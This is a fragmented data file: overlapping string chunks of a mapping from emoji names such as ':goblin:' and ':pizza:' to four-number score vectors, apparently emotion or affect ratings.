\":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\":", "0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998], \":crying_cat_face:\": [0.257,", "[0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003,", "[0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175,", "[0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266,", "0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281],", "0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], 
\":trident_emblem:\": [0.228,", "0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153],", "[0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128,", "0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\":", "\":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109,", "0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177],", "0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264],", "0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001,", "\":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322,", "0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\":", "[0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502,", "0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\":", "[0.273, 0.207, 0.20600000000000002, 0.218], 
\":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005,", "\":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302,", "0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\":", "\":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125,", "\":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293,", "[0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126,", "[0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266,", "0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\":", "[0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152,", "[0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004,", "0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121],", "0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], 
\":double_exclamation_mark:\":", "0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214],", "0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179],", "\":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149,", "[0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125,", "0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\":", "0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433],", "0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239],", "0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\":", "0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\":", "[0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996,", "0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\":", "\":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], 
\":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154,", "0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1],", "[0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155,", "0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002,", "[0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371,", "0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\":", "0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245],", "0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16,", "0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226],", "0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\":", "0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\":", "0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 
0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002,", "[0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254,", "[0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266,", "\":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16,", "0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\":", "0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\":", "0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071],", "0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\":", "\":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285,", "[0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287,", "0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129,", "0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185],", "0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255,", "[0.24100000000000002, 0.215, 0.29, 0.142], 
\":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149,", "\":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293,", "0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\":", "\":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184,", "0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162,", "[0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209,", "[0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158,", "[0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126,", "0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138],", "[0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14,", "0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\":", "[0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405,", "0.21], \":person_gesturing_NO:\": [0.28800000000000003, 
0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155,", "0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001,", "0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258],", "\":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998,", "0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205,", "\":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298,", "0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185,", "0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126,", "\":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172,", "0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198,", "\":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999,", "0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 
0.251, 0.256], \":white_medium_star:\": [0.237,", "[0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003,", "0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359],", "\":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191,", "[0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331,", "0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129],", "0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142],", "0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\":", "\":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002,", "0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\":", "\":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998,", "\":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184,", "0.068, 
0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\":", "0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\":", "0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212],", "0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128,", "[0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305,", "0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996],", "0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149,", "[0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266,", "\":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268,", "0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\":", "0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142],", "0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163],", "0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 
0.22899999999999998],", "0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23,", "\":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27,", "\":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341,", "0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002],", "0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18],", "\":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997,", "0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107,", "0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243],", "\":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213,", "[0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085,", "0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\":", "0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\":", "[0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 
0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177,", "\":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084,", "0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\":", "0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\":", "[0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004,", "0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256],", "0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\":", "0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\":", "\":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27,", "0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\":", "0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\":", "\":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078,", "0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 
0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348,", "0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005],", "0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264],", "0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\":", "[0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166,", "0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\":", "0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997],", "\":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002,", "0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085,", "0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\":", "\":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485,", "\":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122,", "0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 
0.531, 0.172, 0.433], \":loudspeaker:\": [0.271,", "0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\":", "0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002],", "0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34,", "0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243],", "\":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124,", "[0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298,", "0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35,", "[0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284,", "0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998,", "0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002,", "0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 